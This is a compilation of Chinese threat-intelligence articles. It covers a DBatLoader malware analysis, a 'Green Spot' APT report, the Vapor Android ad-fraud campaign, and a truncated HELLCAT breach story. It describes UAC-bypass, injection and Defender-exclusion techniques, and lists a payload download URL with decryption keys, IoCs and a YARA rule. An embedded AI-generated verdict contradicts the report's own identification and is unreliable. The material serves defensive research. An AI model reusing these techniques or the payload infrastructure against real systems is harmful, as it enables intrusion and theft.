1.引言 随着网络攻击技术的不断演变,恶意代码加载器逐渐成为恶意代码执行的关键组成部分。此类加载器是一种用于将各种恶意代码加载到受感染的系统中的恶意工具,通常负责绕过系统安全防护,将恶意代码注入内存中并执行,为后续的特洛伊木马类型恶意代码的部署奠定基础。加载器的核心功能包括持久性机制、无文件内存执行以及多层次规避技术。 安天CERT将近几年历史跟踪储备的典型恶意加载器家族有关信息汇总成专题报告,在未来几个月依次发布,并持续追踪新的流行加载器家族。本项目专题将聚焦加载器技术细节,深入挖掘其在攻击链中的核心功能,包括其混淆技术、加密机制以及注入策略等。此外,我们也会不断完善自身安全产品能力,采取有效技术方案进一步提升针对加载器的识别率和准确率,帮助用户组织提前发现并阻止潜在威胁。 2.概述 DBatLoader加载器最初于2020年被发现,主要被用于投放包括Snake Keylogger、Formbook和Agent Tesla在内的多种恶意代码家族。DBatLoader加载器的加载过程分为两个阶段,其中第一阶段主要用于规避反病毒引擎的检测,并在内存中解密运行第二阶段载荷。在第二阶段过程中,DBatLoader加载器采用“DDR”(Dead Drop Resolvers)技术,从公共代码托管网站上下载并解密待投递的恶意代码家族,而后通过多种手法将其注入到其他程序内以实现隐蔽运行。 DBatLoader加载器通过不断更新其生存技巧来规避反病毒引擎的检测。它大量运用了混淆技术,从加密和隐藏特征两个维度对程序进行隐蔽处理。DBatLoader加载器使用异或加密和移位加密对字符串和不同阶段的载荷加密处理。为了提高隐蔽性,该加载器还采用了图片隐写术和在代码中穿插无用字符串的方法以隐藏恶意代码特征。除此之外,DBatLoader加载器还会将指定扩展名的文件加入Windows Defender白名单来规避查杀,以便实施后续攻击行为。 该加载器详细信息参见安天病毒百科[1]。 图2-1 长按识别二维码查看DBatLoader加载器详细信息 3.DBatLoader加载器生存技术举例分析 DBatLoader加载器为了逃避和绕过安全检测,使用了多种生存技术,其中包括:混淆技术、注入技术、提权技术、持久化技术和反调试技术。 3.1 混淆技术分析 为了减少文件特征,阻碍分析人员逆向分析,DBatLoader加载器采用了多种文件混淆技术,其中包括技术如下:穿插无用指令、图片隐写、脚本字符串拼接、载荷多层加密、去除文件魔术头、字符串加密、动态加载函数。 3.1.1 穿插无用指令 在DBatLoader加载器的每个阶段载荷中,均有大量重复的尝试hook AMSI(即Antimalware Scan Interface,Windows 反恶意软件扫描接口)的代码,这些代码使原本的程序执行流程变得分散,即增加了逆向分析的难度,又减少了程序执行流程本身带来的二进制特征。 图3-1 DBatLoader加载器使用大量重复的指令填充程序 3.1.2 使用图片隐写术 DBatLoader加载器通过图片隐写术,可以将恶意载荷信息写入到图片中,使其从计算机视角来看和普通图片别无二致,进而达到隐藏目标载荷的目的。当需要获取目标载荷时,该加载器通过特定的算法读取图片,从而将信息还原出来。 图3-2 DBatLoader隐写载荷后的图片 3.1.3 脚本字符串拼接 DBatLoader加载器通过将bat脚本指令进行分割,并在其中穿插无用变量,在运行时使用拼接变量的方式进行还原,以降低文件特征并实现干扰逆向人员分析的目的。 图3-3 DBatLoader加载器混淆过后的bat脚本 3.1.4 多层加密载荷 DBatLoader加载器通过多层加密载荷,以去除载荷特征并增加逆向难度。 图3-4 DBatLoader加载器加密函数 3.1.5 破坏文件特征 DBatLoader加载器通过故意在加密的载荷中去除一个字节以破坏载荷解密后的文件特征,去除的字节由加载器运行时还原,以避免载荷被解密后检测。 图3-5 DBatLoader加载器第一阶段解密后的载荷 3.1.6 加密字符串 DBatLoader加载器通过将部分字符串(如注入的程序名,自启动注册表路径等)进行加密以防止字符串被作为特征进行识别检测。 图3-6 DBatLoader字符串加密算法 3.1.7 函数动态加载 DBatLoader加载器通过调用GetProcAddress来动态加载函数以防止导入函数所带来的文件特征。 图3-7 DBatLoader加载器动态加载函数 3.2 注入技术分析 DBatLoader加载器提供了三种注入方式,分别为线程注入、APC注入和进程镂空,并且最终会根据载荷的配置文件选择注入方式。 其中调用的API如表3-1所示,DBatLoader加载器在注入过程中都尽量使用了ntdll.dll的导出函数,而不是直接使用kernel32.dll的导出函数,以减少调用链的长度,降低被hook的可能性。 表3-1 DBatLoader加载器注入过程使用的API 创建进程 CreateProcessAsUserW WinExec 修改内存 NtOpenProcess NtUnmapViewOfSection ZwAllocateVirtualMemory NtReadVirtualMemory WriteVirtualMemory RtlMoveMemory 执行载荷 NtCreateThreadEx NtQueueApcThread GetThreadContext SetThreadContext ResumeThread 3.3 提权技术分析 DBatLoader加载器为了绕过UAC实现提权,需要让程序在受信任的目录中执行,并且程序还需要带有有效的数字签名。 其中DBatLoader加载器为了在受信任的目录中执行,使用了模拟受信任目录技术。该技术将会创建一个新的目录,该目录和受信任的目录之间有一个空格的区别,但是却能欺骗UAC让其以为程序在受信任的目录中运行。 图3-8 DBatLoader加载器模拟的受信任目录 之后DBatLoader加载器使用了易受DLL劫持的可执行文件,该程序具有合法的数字签名并且能够自动提权,但是会优先加载同目录下的DLL。DBatLoader加载器通过这种白加黑的方式,绕过UAC的限制实现提权。 图3-9 DBatLoader加载器用于白加黑的白文件 3.4 持久化技术分析 DBatLoader加载器通过向HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run写入注册表项实现持久化。 图3-10 DBatLoader加载器写入注册表 3.5 反调试技术分析 DBatLoader加载器在第二阶段会通过IsDebuggerPresent和CheckRemoteDebuggerPresent检测是否有调试器的存在。 图3-11 DBatLoader加载器通过IsDebuggerPresent检测是否存在调试器 4.攻击流程 DBatLoader加载器主要通过钓鱼邮件进行传播。攻击者通过投递钓鱼邮件,诱导受害者运行邮件附件中的恶意程序加载器。当加载器运行时,该加载器会先从自身资源文件中读取包含第二阶段载荷的图片,通过图片隐写术进行解密并运行DBatLoader加载器第二阶段。在第二阶段中,加载器会从公共的文件托管网站下载加密的配置文件。之后DBatLoader加载器会根据该配置文进行持久化并篡改Windows Defender白名单。最后DBatLoader加载器会从配置文件中解密待投递的恶意代码家族并通过注入的方式运行。 图4-1 DBatLoader攻击流程 5.样本分析 5.1 样本标签 表5-1 二进制可执行文件 病毒名称 Trojan/Win32.DBatLoader 原始文件名 Crane Motor Specification,Docx.exe MD5 23434BF113A4651076ECD2898A6C1069 处理器架构 Intel 386 or later processors and compatible processors 文件大小 1.15 MB (1,209,856字节) 文件格式 BinExecute/Microsoft.EXE[:X86] 时间戳 1992-06-19 22:22:17(Delphi程序默认时间戳) 数字签名 无 加壳类型 无 编译语言 Borland Delphi(2006) VT首次上传时间 2024-10-14 04:26:54 VT检测结果 52/73 5.2 DBatLoader加载器第一阶段 DBatLoader加载器第一阶段中存在大量劫持AMSI API的函数的代码以规避反病毒引擎的扫描,但是此部分代码存在缺陷,该功能并未实现。 图5-1 DBatLoader加载器有缺陷的hook API实现 DBatLoader加载器第一阶段对下一阶段载荷采取了多层加密。该加载器首先从资源文件中加载包含下一阶段载荷的图片,并通过图片隐写术把加密的载荷读取出来。 图5-2 DBatLoader加载器读取资源文件 其中DBatLoader加载器会从图片中逐行以蓝绿红的顺序读取字节以获取隐写信息,其中图片隐写所占用的bit数记录在了读取的前3个字节上。随后该加载器通过隐写术的方式读取了32bit信息,用来获取加密载荷的总字节数。之后该加载器将继续从图片中读取信息直到获得全部的加密载荷。 图5-3 DBatLoader加载器读取隐写图片 随后DBatLoader加载器逐字节对第二阶段载荷加0x80并在载荷头部添加一个字符“M”成对第二阶段载荷的解密。 图5-4 DBatLoader加载器解密第二阶段载荷 最后DBatLoader加载器将二阶段载荷映射进内存并调用入口点进入第二阶段。 图5-5 DBatLoader加载器加载二阶段载荷 5.3 DBatLoader加载器第二阶段 DBatLoader加载器第二阶段通过在主函数逻辑中设置一个计时器来触发第二阶段恶意逻辑。 图5-6 DBatLoader加载器设置计时器 在DBatLoader加载器第二阶段中,有着和第一阶段一样的规避反病毒引擎逻辑,但是因为设计缺陷导致功能未能实现。 图5-7 第二阶段规避反病毒引擎逻辑 在DBatLoader加载器第二阶段,部分字符串被一种异或算法加密。当需要解密字符串时,加载器会先逐字符拼接形成一个异或密钥,随后加载器会逐字节地将加密字符串的低8位与密钥的低8位异或解密,以获得明文字符串。 图5-8 DBatLoader加载器解密字符串算法 在DBatLoader加载器第二阶段,程序会将要投递的载荷下载地址存放在第一阶段载荷当中。在第二阶段,DBatLoader加载器会在第一阶段载荷文件中搜索特定的字符串,以定位加密配置的位置。 图5-9 DBatLoader加载器获取加密配置 当获取到加密配置后,DBatLoader加载器会用配置中的一个整数用作解密密钥,解密加密的字符串,以获取投递目标载荷的下载地址。 图5-10 DBatLoader加载器解密载荷下载地址算法 之后DBatLoader加载器将通过WinHttpRequest对象下载投递的载荷。 图5-11 DBatLoader加载器下载载荷 当DBatLoader加载器下载载荷后,程序会base64解码后多次添加偏移量来解密载荷。 图5-12 DBatLoader加载器解密下载的载荷 随后DBatLoader加载器通过一个特定的字符串分割载荷,得到载荷的配置文件。当加载器解密配置文件后,会根据配置文件选择是否进行篡改反病毒引擎策略、持久化、线程注入、APC注入、进程镂空等操作。 图5-13 DBatLoader加载器读取配置文件 5.3.1 DBatLoader加载器篡改Windows Defender白名单 当配置文件中启动篡改Windows Defender白名单功能时,加载器会通过自身代码和释放的bat脚本来将特定文件扩展名加入白名单中。 图5-14 去混淆后的用于修改Windows Defender策略的脚本 DBatLoader加载器会创建一个路径中带有一个额外空格的C:\Windows \SysWOW64目录来模拟可信目录,随后会释放一个具有自动提权能力且易被DLL劫持的合法的easinvoker.exe用来提权。最后加载器会释放一个会被easinvoker.exe加载的恶意netutils.dll,该DLL会将exe、bat、pif程序加入Windows Defender白名单。 图5-15 netutils.dll中用于添加文件扩展名白名单的核心载荷 5.3.2 DBatLoader加载器通过设置自启动项实现持久化 当启用持久化功能时,DBatLoader加载器以配置文件中malware_filename作为文件名将自身复制到C:\Users\Public\Libraries\malware_filename.PIF,并在C:\Users\Public\下创建文件malware_filename.url,并将其加入到注册表HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下以实现自启动的功能。 图5-16 DBatLoader加载器创建的用于持久化的.url文件 如果启用了保存配置文件功能,DBatLoader加载器还会将下载的还未被解密的配置文件以malware_filename作为文件名保存到C:\Users\Public\Libraries\下,以供后续使用。 图5-17 DBatLoader加载器保存下载的配置文件 5.3.3 DBatLoader加载器执行目标载荷 DBatLoader加载器会尝试寻找系统中是否存在SndVol.exe,如果不存在则会注入程序到iexpress.exe。 图5-18 DBatLoader加载器选择注入的程序 随后DBatLoader加载器会将配置文件中的目标载荷多层解密,获得真实恶意载荷。 图5-19 DBatLoader加载器对恶意载荷的加密算法 之后DBatLoader加载器会根据配置文件,选择程序的注入方式。如果启用了APC注入功能,则DBatLoader加载器会通过APC注入方式注入到目标进程。 图5-20 DBatLoader加载器通过APC注入执行恶意代码 如果启用了线程注入功能,则DBatLoader加载器通过线程注入方式将载荷注入到目标进程。 图5-21 DBatLoader加载器通过线程注入执行恶意代码 如果APC注入和线程注入都未启用,则DBatLoader加载器通过进程镂空的方式将载荷注入到目标进程。 图5-22 DBatLoader加载器通过进程镂空执行恶意代码 通过解密分析,最终确定投递的目标载荷为Snake Keylogger,该键盘记录器家族曾在此前发布的分析报告中进行过详细分析[1],此处不宜赘述,感兴趣的读者可前往阅读。 图5-23 DBatLoader加载器投递的最终载荷 6.IoCs IoCs 23434BF113A4651076ECD2898A6C1069 5D707EF2DB982821B0246CE6AA1300C1 6D23FE871B2064C6D13580A5745F23CB CE875D76D02C456326D6381881281667 7.样本对应的ATT&CK映射图谱 图7-1 技术特点对应ATT&CK的映射 具体ATT&CK技术行为描述表: 表7-1 ATT&CK技术行为描述表 ATT&CK阶段/类别 具体行为 注释 持久化 利用自动启动执行引导或登录 通过添加注册表自启动项实现持久化 提权 滥用提升控制权限机制 通过模拟可信目录的方式进行提权 执行流程劫持 在提权的过程中通过劫持了easinvoker.exe执行流程 防御规避 规避调试器 第二阶段通过IsDebuggerPresent和CheckRemoteDebuggerPresent检测调试器 削弱防御机制 将部分文件扩展名加入Windows Defender白名单 删除信标 在提权结束后会清理提权使用的文件 混淆文件或信息 通过图片隐写术加密第二阶段载荷 使用多种古典加密算法加密载荷 部分字符串使用算法加密 动态解析API 提权脚本中使用大量无用字符进行混淆 进程注入 通过DLL注入、APC注入或进程镂空的方式投递目标载荷 8.防御建议 针对此类威胁,安天建议企业增强业务人员的安全意识,降低组织被攻击的可能性。企业员工日常应注意邮件使用,避免运行未知来源邮件附件或者访问邮件中可疑网络链接。 另外,终端作为安全防护的基石,建议企业在办公机、服务器等节点上部署企业级终端安全防护系统。面向终端设备,安天可为企业用户提供安天智甲终端防御系统,为终端提供病毒查杀、主动防御、勒索防护、主机管控、网络防护等多种能力,实现有效防御各类威胁。 8.1 智甲助力用户防御加载器威胁 经过测试,安天智甲终端安全系列产品(以下简称“智甲”)依托安天自研威胁检测引擎和内核级主动防御能力,可以有效查杀和防御本次发现病毒样本。 智甲可对本地磁盘进行实时监测,对新增文件自动化进行病毒检测,针对此次威胁,当用户通过接收邮件附件、微信传输、网络下载等方式将DBatLoader加载器存储至本地时,智甲会立即对该病毒进行告警并清除恶意文件,防止用户启动文件导致终端遭受攻击。 图8-1 发现病毒时,智甲第一时间捕获并发送告警 智甲还为用户提供统一管理平台,管理员可通过平台集中查看网内威胁事件详情,并批量进行处置,提高终端安全运维效率。 图8-2 智甲管理中心助力管理员实现高效的终端安全管理 9.安天澜砥威胁检测分析垂直大模型 安天澜砥威胁检测分析垂直大模型能对样本进行自动化分析,解析内容如下: 判定结果: 根据提供的日志,分析工具判定该文件为 Trojan.Win32.Bandan[Backdoor],即一个用于后门的特洛伊木马。 评估日志中的结果准确度: 准确度:95% 详细解释: 1.特征匹配: ○ 字符串匹配: 日志中多处出现与已知恶意字符串匹配的特征,例如: ■ "Delphi.",可能表明该文件是用Delphi编写的,这是一种常见的后门编写语言。 ■ "mail.ru>",可能用于进行远程控制或信息窃取。 ■ "Darkick",可能是恶意软件的作者或隐藏身份的标识。 ■ "Trojan.Win32.Bandan",明确指出了该文件属于特定的后门类型。 ○ 异常指令和调用: 日志中包含大量的汇编指令和特定的API调用,这些调用通常用于隐藏活动、监听网络流量或执行命令。 ■ 例如,"FF 95 E4 B2 9E B2 C0 CB EB EB 89 82 E7 BC E4 80" 等,可能涉及代码混淆或指令重写。 ■ "87 00 00 07 07 07 00 00 00 80 BB BB 00 00 00 00 00 80 00 07 07 07 00 00 80 33 00 00 00 00 00 00",可能是代码段的填充或异常处理。 ■ "28 2D 2F 29 31 31 32 31 32 2D 32 34 2D 33 37 29 49 46 53 54 52 56 59 51 5B 62 4F 63 64 5F 67 67 67 60 67 52 63 69 55 67 6A 60 7B 84 79 95 96 92",可能涉及数据加密或解密操作。 2.异常行为特征: ○ 代码混淆: 日志中多次出现大量的重复或混淆的指令,如 "FF 95 E4 B2 9E B2 C0 CB EB EB 89 82 E7 BC E4 80",这表明代码可能经过混淆处理,隐藏真实意图。 ○ 异常指令序列: 多次出现的异常指令序列和不规则的指令组合,可能用于绕过安全检测或隐藏恶意功能。 ○ 多线程和进程控制: 日志中提到的多线程创建和进程管理,可能用于建立隐藏的后门会话或执行后台任务。 3.文件结构分析: ○ 大量数据段和代码段: 日志显示文件包含大量的数据段和代码段,这些段可能被恶意软件用于隐藏或加载恶意代码。 ○ 异常的段偏移和大小: 多处出现异常的段偏移和大小,如 "FF 95 E4 B2 9E B2 C0 CB EB EB 89 82 E7 BC E4 80",可能用于动态代码加载或执行。 4.可疑的API调用: ○ 网络通信: 多次出现与网络通信相关的API调用,如 "socket"、"connect"、"send" 等,可能用于建立远程连接或数据传输。 ○ 进程操作: "CreateRemoteThread"、"OpenProcess" 等调用,可能用于在远程进程中注入恶意代码或建立后门会话。 5.文件特征: ○ 异常的文件大小: 文件大小为 1,209,856 字节,与典型的可执行文件大小相比,可能表明该文件进行了压缩或加密,以逃避检测。 ○ 特征片段缺失: 多处出现 ?? 表示未被选中作为特征使用,可能表示这些数据被排除在分析之外。 结论: 基于上述特征匹配和行为分析,分析工具判定该文件为 Trojan.Win32.Bandan[Backdoor],其行为特征与已知的后门木马行为高度一致。日志中的检测结果准确度较高,建议对该文件进行进一步的隔离和分析。 准确度解释: • 高准确度(95%)基于日志中明确的恶意字符串、异常指令和API调用,以及文件特征的匹配,系统认为该文件具有高风险。 • 低误报率: 由于该判定基于已知的恶意特征,较少受到误报可能,但不排除极少数极不常见的变种被误判的可能性。 按照国标草案给出威胁分类为Trojan.Win32.Bandan,自动提取特征生成的YARA规则如下: rule Trojan.Win32.Bandan:Trojan { meta: description = "这是一段由 VILLM V2 模型生成的 YARA 规则。用于检测Trojan.Win32.Bandan" strings: $a = {FF FF FF FF 01 00 00 00 ?? 00} condition: #a > 100 } 安天澜砥威胁检测分析垂直大模型是国内首个通过国家网信办备案的威胁检测生成式算法。模型基于安天赛博超脑20余年积累的海量样本特征工程数据训练而成,训练数据包括文件识别信息、判定信息、属性信息、结构信息、行为信息、主机环境信息、数据信息等,支持对不同场景下向量特征进行威胁判定和输出详实的知识理解,形成应用不同需求和场景的多形态的检测方式,提升后台隐蔽威胁判定能力,进一步为安全运营赋能。 图9-1 安天澜砥威胁检测分析垂直大模型样本分析结果 参考资料 [1]. 安天.Trojan/BAT.DbatLoader病毒详解与防护-计算机病毒百科[R/OL].(2025-03-14) https://www.virusview.net/malware/Trojan/BAT/DbatLoader [2]. 安天.利用OneNote文档投递Snake Keylogger的钓鱼活动分析[R/OL].(2023-04-18) https://www.antiy.cn/research/notice&report/research_report/20230418.html
1.概述 2024年下半年,安天应急响应中心跟踪到“绿斑”组织[1]针对我国特定行业目标的APT攻击活动。攻击者向目标单位的官方账号发鱼叉式钓鱼邮件,引导目标点击链接访问伪装成某单位的恶意网站,该网站主动跳转下载,诱导受害者保存并执行伪装成PDF图标的下载器程序,下载器负责获取和解密伪装成视频后缀的恶意载荷在内存中运行。截止目前观察到的恶意载荷主要是Sliver远控木马[2]等开源的命令与控制框架,攻击者以此对目标开展长期的主机控制、网络横向移动和窃密活动。安天CERT根据攻击事件关注目标领域、钓鱼流程的技术特点,结合历史分析数据信息和开源情报,综合判断攻击活动的来源为中国台湾省当局“绿斑”攻击组织。2018年9月,安天曾经发布过该组织的网络攻击活动报告“‘绿斑’行动——持续多年的攻击”[1],揭露了该组织从2007年开始的攻击活动。 基于安天去年下半年已经协助相关行业管理部门完成相关事件进行了有效通报处置,安天CERT决定正式公布本报告。相关攻击活动的特点如下表: 表1-1 绿斑攻击活动特征 攻击启示时间 2024年3月(开始攻击筹划准备) 攻击目标 我国特定行业领域 攻击意图 持续控制、窃密 诱饵类型 伪装成PDF的EXE可执行文件 攻击手法 鱼叉式钓鱼邮件、文件图标伪装、开源远控 开发语言 C#语言、Go语言 武器装备 开源远控Sliver 2.攻击活动分析 2.1 恶意网站分析 攻击者通过邮件诱导目标访问恶意网站,网站伪装成某管理局的政府信息公开网页: 图2-1 恶意网页案例 网页加载完毕后自动跳转,开始下载诱饵下载器文件: 图2-2 恶意网页跳转下载代码案例 2.2 诱饵下载器分析 诱饵下载器是图标伪装成PDF文档的C#程序,部分样例对时间戳进行篡改,文件名以领导关于党纪事件发言、个人身份证件信息等主题诱导目标点击执行,以拓线样本为例: 图2-3 诱饵下载器案例 表2-1 诱饵下载器样本标签 病毒名称 Trojan/Win64.MSlL.Wagex 原始文件名 ***身份证扫描.exe MD5 3BD15B16A9595D20C0E185AB1FAE738F 处理器架构 Intel 386 or later processors 文件大小 116.50 KB (119,296 bytes) 文件格式 BinExecute/Microsoft.EXE[:X86]} 时间戳 2024:03:12 02:20:07 [UTC+8] 编译语言 C# 加壳类型 无 下载器的代码内容被混淆处理,解混淆前后样本Main函数对比如下图: 图2-4 解混淆前后的主函数代码 主函数首先调用smethod_2方法从链接“https://128.199.134.3/mp4/mov.mp4”下载伪装成视频文件的加密载荷数据。 图2-5 下载伪装成视频文件的加密载荷 然后调用smethod_0函数使用 AES 算法解密下载得到的mov.mp4字节数组。解密使用到的Key: “LgUmeMnmUpRrCCRA”,IV:“nStxRW4o6TNHcKBm”。其中Key必须与加密时使用的密钥完全一致,才能正确解密数据。IV是一个随机或伪随机的值,用于确保相同的明文在每次加密时生成不同的密文。 图2-6 解密载荷数据 调用smethod_1方法,使用 GZipStream 解压缩AES 算法解密得到的字节数组。 图2-7 解压缩载荷数据 调用smethod_3方法,使用多个委托和非托管代码来处理smethod_1方法解压缩得到的字节数组,以此最终解密得到载荷,并将其执行。 图2-8 处理解压缩得到的载荷数据 2.3 开源远控载荷分析 伪装成MP4视频文件后缀名的载荷数据内容被完全加密,经过上述解密解压缩流程后得到的载荷具有反调试功能,基于初始入口、主要功能等多个代码位置的对比同源,以及C2控制上线通讯流量中Client Hello数据包的JA3指纹(19e29534fd49dd27d09234e639c4057e),可以发现载荷是由知名的开源红队命令与控制框架项目Sliver生成的。 图2-9 Client Hello数据包的JA3指纹与Sliver远控特征一致 根据开源代码项目介绍[2],Sliver是一个类似于CobaltStrike的开源红队命令与控制模拟框架,可跨Windows、Linux和MAC系统平台,支持基于 Mutual TLS (mTLS)、WireGuard、HTTP(S) 和 DNS等多种网络协议通讯方式,具备类似CobaltStrike和Metasploit等工具的大多数后渗透阶段功能。 表2-2 Sliver远控框架特性 特性 说明 跨平台支持 支持MacOS、Windows和Linux系统。 C2 通信 支持通过Mutual TLS (mTLS)、WireGuard、HTTP(S) 、DNS进行命令与控制通信。 动态代码生成 在编译时进行代码混淆,增强安全性。 多种Payload 支持分阶段和无阶段的Payload。 脚本化 可以使用JavaScript/TypeScript或Python进行完全脚本化。 内存执行 支持在内存中执行.NET程序集和COFF/BOF加载器。 其他功能 包括进程迁移、文件窃取、进程注入、用户令牌操作等后渗透功能。 3.威胁框架视角的攻击映射 本次系列攻击活动共涉及ATT&CK框架10阶段的25个技术点,具体行为描述如下表: 表3-1 本次绿斑组织攻击活动的技术行为描述表 ATT&CK阶段 具体行为 注释 侦察 搜集受害者身份信息 搜集得到目标的身份信息 搜集受害者网络信息 搜集得到目标的办公邮箱账号 搜集受害者组织信息 搜集得到目标的办公单位信息 资源开发 获取基础设施 注册域名和服务器 能力开发 开发恶意网站,诱饵程序、远控平台及载荷 建立账户 注册用于发送钓鱼邮件的发件账号 初始访问 网络钓鱼 通过鱼叉式钓鱼邮件发起攻击 执行 诱导用户执行 通过诱导用户点击诱饵程序开始木马执行流程 防御规避 规避调试器 远控内存载荷具备反调试能力 仿冒 恶意网站和诱饵程序皆有仿冒规避 发现 发现远程系统 Sliver远控可测探内网远程系统 扫描网络服务 Sliver远控可扫描远程系统的网络服务 发现系统信息 Sliver远控可查询系统版本信息 发现系统网络配置 Sliver远控可查询系统网络配置信息 发现账户 Sliver远控可查找系统账户信息 发现文件和目录 Sliver远控可获取文件和目录信息 发现系统所有者/用户 Sliver远控可查询系统的用户和权限组信息 发现进程 Sliver远控可查询系统的当前进程信息 收集 收集本地系统数据 Sliver远控可收集本地系统的版本、账户等数据 输入捕捉 Sliver远控可进行输入捕捉 屏幕捕获 Sliver远控可进行屏幕捕获 命令与控制 使用应用层协议 Sliver远控载荷使用应用层协议实现命令控制 编码数据 Sliver远控载荷命令控制流量中会加密编码数据 数据渗出 使用C2信道回传 Sliver远控载荷使用固定C2信道回传数据 影响 操纵数据 攻击者可基于Sliver远控操纵受害主机数据 将涉及到的威胁行为技术点映射到ATT&CK框架如下图所示: 图3-1 本次绿斑攻击活动对应ATT&CK映射图 4.小结 基于上述的分析,安天CERT研判这是来自台湾省当局背景的“绿斑”APT组织的攻击活动。该组织在2018年被安天正式命名并曝光,并被央视焦点访谈[3]报道。攻击者对特定行业的目标,构建有较强社工欺骗性的素材,进行鱼叉式钓鱼攻击,载荷经过多重伪装加密,最终实现开源远控框架的木马植入,攻击手法,具有明显的针对性。 应对相关攻击需要构建好终端安全基石加强防护,可以依托邮件安全、网络流量监测、终端防护、XDR联动分析、网关封堵的构成防御层次,特别是使用带有有效杀毒和主防能力与较强反钓鱼功能的终端安全防护软件。基于其攻击的社工特点和不停随处吐口香糖式的攻击粘性,提高安全意识也是防范的重要环节。 附录一:参考资料 [1] 安天.“绿斑”行动——持续多年的攻击[R/OL].(2018-09-19) https://www.antiy.cn/research/notice&report/research_report/20180919.html [2] BishopFox/sliver[R/OL].(2025-02) https://github.com/BishopFox/sliver [3] 《焦点访谈》 20181007 信息安全:防内鬼 防黑客[R/OL].(2018-10-07) http://tv.cctv.com/2018/10/07/VIDEHBYLGmnR5LoYZawu3dZc181007.shtml [4] 关键基础设施安全应急响应中心.针对绿斑组织近期APT攻击活动的分析报告[R/OL].(2020-08-12) https://mp.weixin.qq.com/s/275EYNAjOGLn19ng56-czA 附录二:IoCs IoCs 61C42751F6BB4EFAFEC524BE23055FBA 7F0DBA2DB8C3FDD717D83BB693B3ADE9 67D10E267C5EBF2DE55D086D0B2393A6 3BD15B16A9595D20C0E185AB1FAE738F 7BB36B1EBCB43172B5188AD61946D2D0 caa***n[.]com/auto-download.zip 158.247.***.***/mp4/ads.mp4 128.199.***.***/mp4/mov.mp4 Caa***n.com Caa***n.org Ba***cingcloud.com 165.22. ***.*** 158.247.***.*** 128.199. ***.***
IAS 威胁实验室发现,自 2024 年初起,一系列恶意活动在 Google Play 平台悄然展开,该实验室将其命名为 “Vapor”。此次恶意行动涉及超过 300 个恶意 Android 应用程序,这些应用累计从 Google Play 下载量高达 6000 万次。它们要么充当广告软件,要么试图窃取用户的凭证和信用卡信息。 IAS 发现,在 “Vapor” 活动中,有 180 个应用程序参与其中,这些应用每天能产生 2 亿个欺诈性广告竞标请求,以此实施大规模广告欺诈。而 Bitdefender 最新发布的报告显示,恶意应用程序的数量已增加到 331 个,且报告指出,巴西、美国、墨西哥、土耳其和韩国等地出现了大量感染情况。Bitdefender 发出警告:“这些应用程序不仅会展示不合理的广告,甚至还试图在网络钓鱼攻击中诱骗受害者泄露凭证和信用卡信息。” 尽管目前所有这些恶意应用程序均已从 Google Play 下架,但 “Vapor” 活动极有可能通过新应用程序再次卷土重来,毕竟威胁行为者此前已展现出绕过 Google 审核流程的能力。 Google Play 上的 Vapor 应用 “Vapor” 活动所涉及的应用程序多为具备特定功能的实用工具,例如健康和健身追踪、笔记工具和日记、电池优化器以及二维码扫描仪等。这些应用能够通过 Google 的安全审查,原因在于它们包含所宣传的功能,并且在提交时并不含有恶意组件。然而,恶意软件功能会在用户安装应用后,通过命令和控制(C2)服务器提供的更新进行下载。 Google Play 上的恶意应用程序 来源:IAS Threat Lab Bitdefender 和 IAS 着重指出了一些具有代表性的案例,包括: · AquaTracker —— 下载量达 100 万次; · ClickSave Downloader —— 下载量达 100 万次; · Scan Hawk —— 下载量达 100 万次; · Water Time Tracker —— 下载量达 100 万次; · Be More —— 下载量达 100 万次; · BeatWatch —— 下载量 50 万次; · TranslateScan —— 下载量 10 万次; · Handset Locator —— 下载量 50,000 次。 这些应用由不同的开发者帐户上传至 Google Play,每个帐户仅向商店推送少量应用,目的是避免在应用被删除时遭受严重损失。同样,每个发布商还会使用不同的广告 SDK。大多数 “Vapor” 应用于 2024 年 10 月至 2025 年 1 月期间在 Google Play 发布,不过上传行为一直持续到 3 月。 Google Play 上的 Vapor 应用提交 Bitdefender 恶意功能 恶意的 “Vapor” 应用在安装后,会关闭 AndroidManifest.xml 文件中的启动器活动,使其在用户设备上不可见。在部分情况下,它们会在 “设置” 中更改自身名称,伪装成诸如 Google Voice 等合法应用。应用程序无需用户交互即可自动启动,并利用本机代码启用辅助隐藏组件,同时保持启动器处于禁用状态,以此隐藏应用图标。Bitdefender 评论称,这种手段绕过了 Android 13 + 系统的安全保护措施,该措施原本旨在防止应用程序在启动后动态禁用自身的启动器活动。 此外,该恶意软件还绕过了 Android 13 + 上的 “SYSTEM_ALERT_WINDOW” 权限限制,创建出一个充当全屏覆盖的辅助屏幕。广告便显示在这个覆盖所有其他应用程序的屏幕上,并且由于 “返回” 按钮被禁用,用户无法退出。该应用程序还会将自己从 “最近任务” 中删除,导致用户难以确定是哪个应用启动了这些广告。 Bitdefender 报告指出,部分应用程序的恶意行为不止于广告欺诈,它们还会显示 Facebook 和 YouTube 的虚假登录屏幕,以窃取用户凭证,或者以各种借口诱导用户输入信用卡信息。 针对此类情况,通常建议 Android 用户避免安装来自不知名发布商的不必要应用程序,仔细检查授予应用的权限,并将应用程序抽屉中的应用与 “设置”→“应用程序”→“查看所有应用程序” 中已安装的应用程序列表进行比对。
HELLCAT 勒索软件组织宣称对捷豹路虎(JLR)的重大数据泄露事件负责。此次事件致使大量敏感数据外泄,其中包含专有文档、源代码、员工信息以及合作伙伴详细信息。 该组织的攻击模式与之前针对西班牙电信、施耐德电气和 Orange 等知名企业的攻击如出一辙,都依赖利用受损的员工凭证,尤其是从 Atlassian Jira 实例中获取的凭证。 事件分析 此次泄密事件的核心,是一种愈发有效的攻击技术:先使用信息窃取恶意软件窃取凭证,再凭借这些凭证渗透进企业关键系统。在此次案件中,被泄露的凭证属于一名 LG 电子员工,该员工感染了信息窃取者恶意软件,且有权限访问 JLR 的 Jira 服务器。此次攻击导致名为 “Rey” 的威胁行为者泄露了 JLR 的数百份内部文件。 此次泄密事件中发现了该公司数百份内部文件 追踪信息窃取者感染的网络安全公司 Hudson Rock 指出,由于这类感染,数千家公司的 Jira 相关凭证遭到泄露。 Hudson Rock 的网络犯罪情报数据库由超过 30,000,000 台受 Infostealer 感染的计算机组成,显示数千家不同的公司因 Infostealer 感染而泄露了与 Jira 相关的凭证 该公司数据库中有超过 3000 万台受感染计算机,这充分显示出此类威胁的广泛性。 在 Rey 首次发布声明几天后,另一个以 “APTS” 为别名的威胁行为者现身,声称自 2021 年起就利用类似凭证访问 JLR 的系统,这导致了更大规模的数据泄露,估计数据量达 350GB。APTS 分享了 Jira 